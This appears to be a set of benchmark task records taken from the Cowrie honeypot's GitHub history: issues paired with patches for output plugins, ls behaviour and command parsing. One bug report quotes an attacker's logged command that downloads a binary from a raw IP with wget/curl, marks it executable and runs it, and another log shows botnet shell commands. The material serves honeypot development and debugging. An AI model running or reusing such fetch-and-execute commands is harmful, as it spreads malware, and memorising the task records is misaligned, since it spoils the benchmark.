diff --git a/src/cowrie/output/mongodb.py b/src/cowrie/output/mongodb.py --- a/src/cowrie/output/mongodb.py +++ b/src/cowrie/output/mongodb.py @@ -47,6 +47,8 @@ def start(self): self.col_ttylog = self.mongo_db['ttylog'] self.col_keyfingerprints = self.mongo_db['keyfingerprints'] self.col_event = self.mongo_db['event'] + self.col_ipforwards = self.mongo_db['ipforwards'] + self.col_ipforwardsdata = self.mongo_db['ipforwardsdata'] except Exception as e: log.msg('output_mongodb: Error: %s' % str(e)) @@ -121,6 +123,12 @@ def write(self, entry): elif eventid == 'cowrie.client.fingerprint': self.insert_one(self.col_keyfingerprints, entry) + elif eventid == 'cowrie.direct-tcpip.request': + self.insert_one(self.col_ipforwards, entry) + + elif eventid == 'cowrie.direct-tcpip.data': + self.insert_one(self.col_ipforwardsdata, entry) + # Catch any other event types else: self.insert_one(self.col_event, entry) diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -204,3 +204,15 @@ def write(self, entry): 'INSERT INTO `keyfingerprints` (`session`, `username`, `fingerprint`) ' 'VALUES (%s, %s, %s)', (entry["session"], entry["username"], entry["fingerprint"])) + + elif entry["eventid"] == 'cowrie.direct-tcpip.request': + self.simpleQuery( + 'INSERT INTO `ipforwards` (`session`, `timestamp`, `dst_ip`, `dst_port`) ' + 'VALUES (%s, FROM_UNIXTIME(%s), %s, %s)', + (entry["session"], entry["time"], entry["dst_ip"], entry["dst_port"])) + + elif entry["eventid"] == 'cowrie.direct-tcpip.data': + self.simpleQuery( + 'INSERT INTO `ipforwardsdata` (`session`, `timestamp`, `dst_ip`, `dst_port`, `data`) ' + 'VALUES (%s, FROM_UNIXTIME(%s), %s, %s, %s)', + (entry["session"], entry["time"], entry["dst_ip"], entry["dst_port"], entry["data"])) diff --git a/src/cowrie/output/sqlite.py b/src/cowrie/output/sqlite.py --- a/src/cowrie/output/sqlite.py +++ b/src/cowrie/output/sqlite.py @@ -176,3 +176,15 @@ def write(self, entry): 'INSERT INTO `keyfingerprints` (`session`, `username`, `fingerprint`) ' 'VALUES (?, ?, ?)', (entry["session"], entry["username"], entry["fingerprint"])) + + elif entry["eventid"] == 'cowrie.direct-tcpip.request': + self.simpleQuery( + 'INSERT INTO `ipforwards` (`session`, `timestamp`, `dst_ip`, `dst_port`) ' + 'VALUES (?, ?, ?, ?)', + (entry["session"], entry["timestamp"], entry["dst_ip"], entry["dst_port"])) + + elif entry["eventid"] == 'cowrie.direct-tcpip.data': + self.simpleQuery( + 'INSERT INTO `ipforwardsdata` (`session`, `timestamp`, `dst_ip`, `dst_port`, `data`) ' + 'VALUES (?, ?, ?, ?, ?)', + (entry["session"], entry["timestamp"], entry["dst_ip"], entry["dst_port"], entry["data"]))
Support to log direct-tcpip to database backends Currently connection attempts are only logged in logfiles and not to database backends. This would be a nice feature :) Support to log direct-tcpip to database backends Currently connection attempts are only logged in logfiles and not to database backends. This would be a nice feature :)
2019-03-13T23:12:50
cowrie/cowrie
1,054
cowrie__cowrie-1054
[ "676" ]
b7a0338f46c8104fbadc06762e6c37cc75cdb4bb
diff --git a/src/cowrie/output/csirtg.py b/src/cowrie/output/csirtg.py --- a/src/cowrie/output/csirtg.py +++ b/src/cowrie/output/csirtg.py @@ -39,9 +39,10 @@ def stop(self): def write(self, e): peerIP = e['src_ip'] ts = e['timestamp'] - system = e['system'] + system = e.get('system', None) - if system not in ['cowrie.ssh.factory.CowrieSSHFactory', 'cowrie.telnet.transport.HoneyPotTelnetFactory']: + if system not in ['cowrie.ssh.factory.CowrieSSHFactory', + 'cowrie.telnet.transport.HoneyPotTelnetFactory']: return today = str(datetime.now().date())
Bug in csirtg plugin @wesyoung Not sure when this bug started, but just looked today at my honeypots and saw this happening all over the place in the logs. ``` 2018-02-11T16:53:14-0500 [twisted.internet.defer#critical] Unhandled error in Deferred: 2018-02-11T16:53:14-0500 [twisted.internet.defer#critical] Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 289, in connectionLost protocol.connectionLost(reason) File "/usr/local/lib/python2.7/dist-packages/twisted/web/client.py", line 223, in connectionLost self.factory._disconnectedDeferred.callback(None) File "/usr/local/lib/python2.7/dist-packages/twisted/internet/defer.py", line 459, in callback self._startRunCallbacks(result) File "/usr/local/lib/python2.7/dist-packages/twisted/internet/defer.py", line 567, in _startRunCallbacks self._runCallbacks() --- <exception caught here> --- File "/usr/local/lib/python2.7/dist-packages/twisted/internet/defer.py", line 653, in _runCallbacks current.result = callback(current.result, *args, **kw) File "/home/cowrie/cowrie/cowrie/commands/wget.py", line 241, in error url=self.url) File "/home/cowrie/cowrie/cowrie/shell/protocol.py", line 80, in logDispatch pt.factory.logDispatch(*msg, **args) File "/home/cowrie/cowrie/cowrie/telnet/transport.py", line 43, in logDispatch output.logDispatch(*msg, **args) File "/home/cowrie/cowrie/cowrie/core/output.py", line 117, in logDispatch self.emit(ev) File "/home/cowrie/cowrie/cowrie/core/output.py", line 206, in emit self.write(ev) File "/home/cowrie/cowrie/cowrie/output/csirtg.py", line 43, in write system = e['system'] exceptions.KeyError: 'system' ```
Which log message generate this? A particular one or all of them? cowrie.log is where i'm seeing the error, don't see the same in cowrie.json Ok! The plugin can take multiple types of messages (new connection, new download, etc). Do yo see the error with all messages or only a particular one? i'm guessing if you add: ```python from pprint import pprint pprint(e) ``` https://github.com/micheloosterhof/cowrie/blob/master/cowrie/output/csirtg.py#L43 it'll show what the log message looks like, and if you change: ``` e['system'] ``` to ``` e.get('system') ``` that error will resolve itself (at-least as a work-around). by skimming it- it looks like some new message types have been added (or the 'system' keyword was changed to something else?) @micheloosterhof Tried testing this and doesn't have any issue but the best practice would be to use the `.get()` to get the values (https://docs.quantifiedcode.com/python-anti-patterns/correctness/not_using_get_to_return_a_default_value_from_a_dictionary.html) If you think using get would be good then I'll make a PR and if not then you can just close the issue because I didn't had kind of problem with this. I think the issue is that there are sometimes log entries without the `system` field, they show up like so in cowrie.log: `2019-03-14T06:18:37.755918Z [Uninitialized] connected to 127.0.0.1:8443` the CSIRTG plugin will have issues with this format. The other output plugins seem to work without needing to access `system`, so it could probably be rewritten in a different way. M. @micheloosterhof Rewritten in other way meaning without having to use the `system` field or rewritten completely? Also if it not very important maybe we can just put it in the `try/except` for now
2019-03-14T19:29:01
cowrie/cowrie
1,060
cowrie__cowrie-1060
[ "703" ]
6010a4c0b0158c5034ef07e06871a9002334f228
diff --git a/src/cowrie/output/reversedns.py b/src/cowrie/output/reversedns.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/reversedns.py @@ -0,0 +1,68 @@ +from __future__ import absolute_import, division + +from twisted.names import client +from twisted.python import log + +import cowrie.core.output +from cowrie.core.config import CONFIG + + +class Output(cowrie.core.output.Output): + """ + Output plugin used for reverse DNS lookup + """ + + def __init__(self): + self.timeout = CONFIG.getint('output_reversedns', 'timeout', fallback=3) + cowrie.core.output.Output.__init__(self) + + def start(self): + """ + Start Output Plugin + """ + pass + + def stop(self): + """ + Stop Output Plugin + """ + pass + + def write(self, entry): + if entry['eventid'] == 'cowrie.session.connect': + self.reversedns(entry['src_ip']) + + def reversedns(self, addr): + """ + Perform a reverse DNS lookup on an IP + + Arguments: + addr -- IPv4 Address + """ + ptr = self.reverseNameFromIPAddress(addr) + d = client.lookupPointer(ptr, timeout=self.timeout) + + def cbError(failure): + log.msg("reversedns: Error in lookup") + failure.printTraceback() + + def processResult(result): + """ + Process the lookup result + """ + RR = result[0][0] + log.msg("Reverse DNS record for ip={0}: {1}".format( + addr, RR.payload)) + + d.addCallback(processResult) + d.addErrback(cbError) + return d + + def reverseNameFromIPAddress(self, address): + """ + Reverse the IPv4 address and append in-addr.arpa + + Arguments: + address {str} -- IP address that is to be reversed + """ + return '.'.join(reversed(address.split('.'))) + '.in-addr.arpa'
Reverse DNS ##### ISSUE TYPE - Feature Idea ##### DESCRIPTION Add the ability to enable Reverse DNS lookups. At the moment a detection contains the IP of the attacker. We would also like to see the Reverse DNS of the attacker. We can lookup the reverse DNS afterwards in Elasticsearch or in the logstash pipeline, but we need to use the local DNS servers of the device which runs Cowrie in order to see the internal reverse DNS/hostnames.
@micheloosterhof @ZeNiRe Can you please give me some more information on this? I mean we can add an option in the config file to enable and disable this and for actually doing this with python we can either do something like ```python import socket reverse = socket.gethostbyaddr(IP)[0] ``` or we can use something more powerful like [dnspython](https://github.com/rthalley/dnspython) to get more info. The thing I am confused about is where should this be added in cowrie as in which files would have to be changed to actually implement this. Also if you think there's some other/better way to do it then please let me know.
2019-03-17T08:39:42
cowrie/cowrie
1,063
cowrie__cowrie-1063
[ "1062" ]
6010a4c0b0158c5034ef07e06871a9002334f228
diff --git a/src/cowrie/shell/pwd.py b/src/cowrie/shell/pwd.py --- a/src/cowrie/shell/pwd.py +++ b/src/cowrie/shell/pwd.py @@ -117,7 +117,7 @@ def setpwentry(self, name): """ # ensure consistent uid and gid - seed_id = crc32(name) + seed_id = crc32(name.encode("utf-8")) seed(seed_id) e = {}
Can't enter using "oracle" or "tomcat" users Hello. I'm using stock userdb.txt file, where "oracle" and "tomcat" users are defined with any password. When using these users, the ssh client gives me an error of "Permission denied (publickey,password)" after entering three times any password. The ugly thing is that in cowrie.json file appear entries of "cowrie.login.success" type with the message "login attempt [oracle/password] suceeded", which is, obviously, incorrect. Thanks a lot
2019-03-19T01:17:52
cowrie/cowrie
1,065
cowrie__cowrie-1065
[ "982" ]
bcf20d85dbadeeb158044a6581ce76aacc27a289
diff --git a/src/cowrie/output/greynoise.py b/src/cowrie/output/greynoise.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/greynoise.py @@ -0,0 +1,124 @@ +""" +Send attackers IP to GreyNoise +""" + +from __future__ import absolute_import, division + +import json + +from twisted.internet import reactor +from twisted.internet.ssl import ClientContextFactory +from twisted.python import log +from twisted.web import client, http_headers +from twisted.web.client import FileBodyProducer + +import cowrie.core.output +from cowrie.core.config import CONFIG + +try: + from BytesIO import BytesIO +except ImportError: + from io import BytesIO + + +COWRIE_USER_AGENT = 'Cowrie Honeypot' +GNAPI_URL = 'http://api.greynoise.io:8888/v1/' + + +class Output(cowrie.core.output.Output): + + def __init__(self): + self.apiKey = CONFIG.get('output_greynoise', 'api_key', fallback=None) + self.tags = CONFIG.get('output_greynoise', 'tags', fallback="all").split(",") + cowrie.core.output.Output.__init__(self) + + def start(self): + """ + Start output plugin + """ + self.agent = client.Agent(reactor, WebClientContextFactory()) + + def stop(self): + """ + Stop output plugin + """ + pass + + def write(self, entry): + if entry['eventid'] == "cowrie.session.connect": + self.scanip(entry) + + def scanip(self, entry): + """Scan IP againt Greynoise API + """ + gnUrl = '{0}query/ip'.format(GNAPI_URL).encode('utf8') + headers = http_headers.Headers({'User-Agent': [COWRIE_USER_AGENT]}) + fields = {'key': self.apiKey, 'ip': entry['src_ip']} + body = FileBodyProducer(BytesIO(json.dumps(fields).encode('utf8'))) + d = self.agent.request(b'POST', gnUrl, headers, body) + + def cbResponse(response): + """ + Main response callback, checks HTTP response code + """ + if response.code == 200: + d = client.readBody(response) + d.addCallback(cbBody) + return d + else: + log.msg("GN Request failed: {} {}".format( + response.code, response.phrase)) + return + + def cbBody(body): + """ + Received body + """ + return processResult(body) + + def cbPartial(failure): + """ + Google HTTP Server does not set Content-Length. Twisted marks it as partial + """ + return processResult(failure.value.response) + + def cbError(failure): + failure.printTraceback() + + def processResult(result): + """ + Extract the information we need from the body + """ + result = result.decode('utf8') + j = json.loads(result) + if j['status'] == "ok": + if "all" not in self.tags: + for query in j['records']: + if query['name'] in self.tags: + message(query) + else: + for query in j['records']: + message(query) + else: + log.msg("GreyNoise Status is Unknown for IP {0}".format(entry['src_ip'])) + + def message(query): + log.msg( + eventid='cowrie.greynoise', + format='Greynoise Scan for %(IP)% with %(tag)% have %(conf)% confidence' + 'along with the following %(meta)% metatdata', + IP=entry['src_ip'], + tag=query['name'], + conf=query['confidence'], + meta=query['metadata'] + ) + + d.addCallback(cbResponse) + d.addErrback(cbError) + return d + + +class WebClientContextFactory(ClientContextFactory): + + def getContext(self, hostname, port): + return ClientContextFactory.getContext(self)
Write GreyNoise API output plugin https://github.com/GreyNoise-Intelligence/api.greynoise.io
2019-03-20T15:12:08
cowrie/cowrie
1,093
cowrie__cowrie-1093
[ "1086" ]
94408f8c41d697f15782f9d5fb73e8f22c1e64e6
diff --git a/src/cowrie/output/greynoise.py b/src/cowrie/output/greynoise.py --- a/src/cowrie/output/greynoise.py +++ b/src/cowrie/output/greynoise.py @@ -6,7 +6,7 @@ import treq -from twisted.internet import defer +from twisted.internet import defer, error from twisted.python import log import cowrie.core.output @@ -59,10 +59,15 @@ def message(query): headers = ({'User-Agent': [COWRIE_USER_AGENT]}) fields = {'key': self.apiKey, 'ip': entry['src_ip']} - response = yield treq.post( - url=gnUrl, - data=fields, - headers=headers) + try: + response = yield treq.post( + url=gnUrl, + data=fields, + headers=headers, + timeout=10) + except (defer.CancelledError, error.ConnectingCancelledError, error.DNSLookupError): + log.msg("GreyNoise requests timeout") + return if response.code != 200: rsp = yield response.text() @@ -72,13 +77,14 @@ def message(query): j = yield response.json() if self.debug: log.msg("greynoise: debug: "+repr(j)) - if j['status'] == "ok": - if "all" not in self.tags: - for query in j['records']: - if query['name'] in self.tags: - message(query) - else: - for query in j['records']: + + if j['status'] == "ok": + if "all" not in self.tags: + for query in j['records']: + if query['name'] in self.tags: message(query) else: - log.msg("greynoise: no results for for IP {0}".format(entry['src_ip'])) + for query in j['records']: + message(query) + else: + log.msg("greynoise: no results for for IP {0}".format(entry['src_ip']))
greynoise should catch timeout error ```2019-04-08T03:12:05.460833Z [twisted.internet.defer#critical] Unhandled error in Deferred: 2019-04-08T03:12:05.462257Z [twisted.internet.defer#critical] Traceback (most recent call last): --- <exception caught here> --- File "/home/cowrie/cowrie/src/cowrie/output/greynoise.py", line 65, in scanip headers=headers) twisted.internet.error.TimeoutError: User timeout caused connection failure. ```
I think this can be fixed by passing the `timeout=10` to the treq request we are sending in [greynoise.py Line#62](https://github.com/cowrie/cowrie/blob/master/src/cowrie/output/greynoise.py#L62). So the requests will become: ```python response = yield treq.post( url=gnUrl, data=fields, headers=headers, timeout=10) ```
2019-04-16T11:40:45
cowrie/cowrie
1,095
cowrie__cowrie-1095
[ "854" ]
338e2edc4ab5096d759d608e751af3b415b9220d
diff --git a/src/cowrie/shell/command.py b/src/cowrie/shell/command.py --- a/src/cowrie/shell/command.py +++ b/src/cowrie/shell/command.py @@ -43,6 +43,9 @@ def __init__(self, protocol, *args): # MS-DOS style redirect handling, inside the command # TODO: handle >>, 2>, etc if '>' in self.args or '>>' in self.args: + if self.args[-1] in ['>', ">>"]: + self.errorWrite("-bash: parse error near '\\n' \n") + return self.writtenBytes = 0 self.writefn = self.write_to_file if '>>' in self.args:
exceptions.IndexError: list index out of range I have recently deployed cowrie on CentOS Linux 7.5 host and I have seen few of following exceptions occurring. ``` 2018-08-13T09:46:46.286838+0300 [CowrieTelnetTransport,68,[redacted]] login attempt [root/] succeeded 2018-08-13T09:46:46.289616+0300 [CowrieTelnetTransport,68,[redacted]] Initialized emulated server as architecture: linux-x64-lsb 2018-08-13T09:46:46.981872+0300 [CowrieTelnetTransport,68,[redacted]] Warning: state changed and new state returned 2018-08-13T09:46:59.394970+0300 [CowrieTelnetTransport,68,[redacted]] CMD: >/dev/netslink/.t && cd /dev/netslink/ && for a in `ls -a /dev/netslink/`; do >$a; done; >retrieve 2018-08-13T09:46:59.397926+0300 [CowrieTelnetTransport,68,[redacted]] Command found: > /dev/netslink/.t 2018-08-13T09:46:59.398837+0300 [CowrieTelnetTransport,68,[redacted]] Command found: cd /dev/netslink/ 2018-08-13T09:46:59.400542+0300 [CowrieTelnetTransport,68,[redacted]] Can't find command None 2018-08-13T09:46:59.400790+0300 [CowrieTelnetTransport,68,[redacted]] Command not found: for a in ` ls -a /dev/netslink/ ` 2018-08-13T09:46:59.404197+0300 [CowrieTelnetTransport,68,[redacted]] Command found: do > 2018-08-13T09:46:59.404647+0300 [CowrieTelnetTransport,68,[redacted]] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/log.py", line 103, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/log.py", line 86, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/context.py", line 122, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/python/context.py", line 85, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 614, in _doReadOrWrite why = selectable.doRead() File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/tcp.py", line 243, in doRead return self._dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/tcp.py", line 249, in _dataReceived rval = self.protocol.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/telnet.py", line 636, in dataReceived self.applicationDataReceived(b''.join(appDataBuffer)) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/telnet.py", line 988, in applicationDataReceived self.protocol.dataReceived(data) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/telnet.py", line 1035, in dataReceived self.protocol.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 107, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 324, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 183, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 104, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 213, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 305, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 122, in start self.exit() File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 140, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 218, in resume self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 213, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 305, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 192, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 122, in start self.exit() File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 140, in exit self.protocol.cmdstack[-1].resume() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 218, in resume self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 211, in runCommand runOrPrompt() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 113, in runOrPrompt self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 213, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 305, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 189, in call_command obj = cmd(self, *args) File "/home/cowrie/cowrie/src/cowrie/shell/command.py", line 53, in __init__ self.outfile = self.fs.resolve_path(str(self.args[(index + 1)]), self.protocol.cwd) exceptions.IndexError: list index out of range 2018-08-13T09:46:59.408466+0300 [CowrieTelnetTransport,[redacted]] Duplicate TTY log with hash 0c58d3d66a63aeca0c3e68d928a26ff686d1e08f0d1c70fca45d0ed955cf833f 2018-08-13T09:46:59.408836+0300 [CowrieTelnetTransport,68,[redacted]] Closing TTY Log: log/tty/0c58d3d66a63aeca0c3e68d928a26ff686d1e08f0d1c70fca45d0ed955cf833f after 12 seconds 2018-08-13T09:46:59.411186+0300 [CowrieTelnetTransport,68,[redacted]] Connection lost after 47 seconds ```
That seems to be a bug in the redirection code. Thanks for reporting this!
2019-04-16T14:57:33
cowrie/cowrie
1,167
cowrie__cowrie-1167
[ "1166" ]
bf422e424c683cffef883243ac50ff1afbcff51c
diff --git a/src/cowrie/shell/protocol.py b/src/cowrie/shell/protocol.py --- a/src/cowrie/shell/protocol.py +++ b/src/cowrie/shell/protocol.py @@ -227,7 +227,9 @@ def connectionMade(self): HoneyPotBaseProtocol.connectionMade(self) self.setTimeout(60) self.cmdstack = [honeypot.HoneyPotShell(self, interactive=False)] - self.cmdstack[0].lineReceived(self.execcmd) + # TODO: quick and dirty fix to deal with \n separated commands + # HoneypotShell() needs a rewrite to better work with pending input + self.cmdstack[0].lineReceived("; ".join(self.execcmd.split('\n'))) def keystrokeReceived(self, keyID, modifier): self.input_data += keyID
Failure to process multiple commands separated by a LF **Describe the bug** Just noticed the following SSH session in the JSON log: ```json {"eventid": "cowrie.session.connect", "src_ip": "104.223.142.185", "src_port": 39191, "timestamp": "2019-07-08T05:52:52.258121Z", "message": "New connection: 104.223.142.185:39191 (192.168.0.6:22) [session: c936ee87fa9e]", "dst_ip": "192.168.0.6", "system": "cowrie.ssh.factory.CowrieSSHFactory", "protocol": "ssh", "isError": 0, "session": "c936ee87fa9e", "dst_port": 22, "sensor": "yoda"} {"macCS": ["hmac-sha1", "hmac-sha1-96", "hmac-md5", "hmac-md5-96", "hmac-ripemd160", "[email protected]"], "session": "c936ee87fa9e", "kexAlgs": ["diffie-hellman-group14-sha1", "diffie-hellman-group-exchange-sha1", "diffie-hellman-group1-sha1"], "message": "Remote SSH version: SSH-2.0-PUTTY", "system": "HoneyPotSSHTransport,2129,104.223.142.185", "src_ip": "104.223.142.185", "version": "SSH-2.0-PUTTY", "sensor": "yoda", "eventid": "cowrie.client.version", "timestamp": "2019-07-08T05:52:52.442134Z", "keyAlgs": ["ssh-rsa", "ssh-dss"], "isError": 0, "compCS": ["none"], "encCS": ["aes128-ctr", "aes192-ctr", "aes256-ctr", "aes256-cbc", "[email protected]", "aes192-cbc", "aes128-cbc", "blowfish-cbc", "arcfour128", "arcfour", "cast128-cbc", "3des-cbc"]} {"eventid": "cowrie.login.success", "username": "root", "timestamp": "2019-07-08T05:52:53.940595Z", "message": "login attempt [root/_] succeeded", "system": "SSHService 'ssh-userauth' on HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "session": "c936ee87fa9e", "password": "_", "sensor": "yoda"} {"eventid": "cowrie.command.input", "timestamp": "2019-07-08T05:52:54.973525Z", "message": "CMD: #!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://104.223.142.185/a21jj\ncurl -O http://104.223.142.185/a21jj\nchmod +x a21jj\n./a21jj\n", "system": "SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "session": "c936ee87fa9e", "input": "#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://104.223.142.185/a21jj\ncurl -O http://104.223.142.185/a21jj\nchmod +x a21jj\n./a21jj\n", "sensor": "yoda"} {"eventid": "cowrie.command.input", "timestamp": "2019-07-08T05:52:55.923271Z", "message": "CMD: ls -la /var/run/gcc.pid", "system": "SSHChannel session (1) on SSHService 'ssh-connection' on HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "session": "c936ee87fa9e", "input": "ls -la /var/run/gcc.pid", "sensor": "yoda"} {"eventid": "cowrie.session.closed", "timestamp": "2019-07-08T05:52:56.339826Z", "message": "Connection lost after 4 seconds", "system": "HoneyPotSSHTransport,2129,104.223.142.185", "isError": 0, "src_ip": "104.223.142.185", "duration": 4.080965995788574, "session": "c936ee87fa9e", "sensor": "yoda"} ``` It is some XorDDoS variant. Notice how the attacker has issued an input command, consisting of multiple commands separated by a `\n` character. For some reason, Cowrie has failed to process this. There are `wget` and `curl` commands - but Cowrie has made no attempt to download from the URLs passed as their arguments - there is no `cowrie.command.success` event (or `cowrie.command.failed` event) and no `cowrie.session.file_download` or `cowrie.session.file_upload` events. Is this some deficiency of the logging - or has Cowrie really failed to process these commands because they are a single line separated by a newline instead of by a semicolon? **Expected behavior** I would expect to see in the logs that the command have been successfully (or unsuccessfully) executed and the corresponding files - downloaded. **Server (please complete the following information):** - OS: Linux yoda 4.15.0-52-generic #56~16.04.1-Ubuntu SMP Thu Jun 6 12:03:31 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux - Python: Python 2.7.12
This is an exec command, right? Not an interactive session? I can reproduce this for an exec command. Right now we don't split the exec requests by \n, and it's only interpreted as a single command. This means we'll need to fix this. regards, Michel.
2019-07-11T07:08:14
cowrie/cowrie
1,234
cowrie__cowrie-1234
[ "1233", "1233" ]
7fc2b26ff86d36eec2d6199b418d44a8c533d4c7
diff --git a/src/cowrie/commands/ls.py b/src/cowrie/commands/ls.py --- a/src/cowrie/commands/ls.py +++ b/src/cowrie/commands/ls.py @@ -4,6 +4,7 @@ from __future__ import absolute_import, division import getopt +import os.path import stat import time @@ -61,7 +62,7 @@ def call(self): for path in paths: func(path) - def do_ls_normal(self, path): + def get_dir_files(self, path): try: if self.protocol.fs.isdir(path) and not self.showDirectories: files = self.protocol.fs.get_path(path)[:] @@ -69,8 +70,9 @@ def do_ls_normal(self, path): dot = self.protocol.fs.getfile(path)[:] dot[fs.A_NAME] = '.' files.append(dot) - # FIXME: should grab dotdot off the parent instead - dotdot = self.protocol.fs.getfile(path)[:] + dotdot = self.protocol.fs.getfile(os.path.split(path)[0])[:] + if not dotdot: + dotdot = self.protocol.fs.getfile(path)[:] dotdot[fs.A_NAME] = '..' files.append(dotdot) else: @@ -82,6 +84,10 @@ def do_ls_normal(self, path): self.write( 'ls: cannot access %s: No such file or directory\n' % (path,)) return + return files + + def do_ls_normal(self, path): + files = self.get_dir_files(path) line = [x[fs.A_NAME] for x in files] if not line: @@ -104,26 +110,7 @@ def do_ls_normal(self, path): self.write('\n') def do_ls_l(self, path): - try: - if self.protocol.fs.isdir(path) and not self.showDirectories: - files = self.protocol.fs.get_path(path)[:] - if self.showHidden: - dot = self.protocol.fs.getfile(path)[:] - dot[fs.A_NAME] = '.' - files.append(dot) - # FIXME: should grab dotdot off the parent instead - dotdot = self.protocol.fs.getfile(path)[:] - dotdot[fs.A_NAME] = '..' - files.append(dotdot) - else: - files = [x for x in files if not x[fs.A_NAME].startswith('.')] - files.sort() - else: - files = (self.protocol.fs.getfile(path)[:],) - except Exception: - self.write( - 'ls: cannot access %s: No such file or directory\n' % (path,)) - return + files = self.get_dir_files(path) largest = 0 if len(files):
'ls -al' incorrectly shows '..' files as duplicates of '.' When using ls inside a cowrie instance the '..' entry is just a duplicate of the '.' entry. The group and user information is often wrong. This is a very easy to check fingerprint of cowrie. **To Reproduce** Steps to reproduce the behavior: 1. SSH into a cowrie instance. 2. `cd /home/richard` 3. `ls -al` 4. The '..' entry has ownership 'richard richard' **Expected behavior** The information for the parent folder should be retrieved. In the case of '/home' from '/home/richard' the owner of '/home' should read as 'root root' 'ls -al' incorrectly shows '..' files as duplicates of '.' When using ls inside a cowrie instance the '..' entry is just a duplicate of the '.' entry. The group and user information is often wrong. This is a very easy to check fingerprint of cowrie. **To Reproduce** Steps to reproduce the behavior: 1. SSH into a cowrie instance. 2. `cd /home/richard` 3. `ls -al` 4. The '..' entry has ownership 'richard richard' **Expected behavior** The information for the parent folder should be retrieved. In the case of '/home' from '/home/richard' the owner of '/home' should read as 'root root'
2019-10-21T03:22:24
cowrie/cowrie
1,237
cowrie__cowrie-1237
[ "1236" ]
2d8dbb9aa19f47acc7901708dc8e76f62174850b
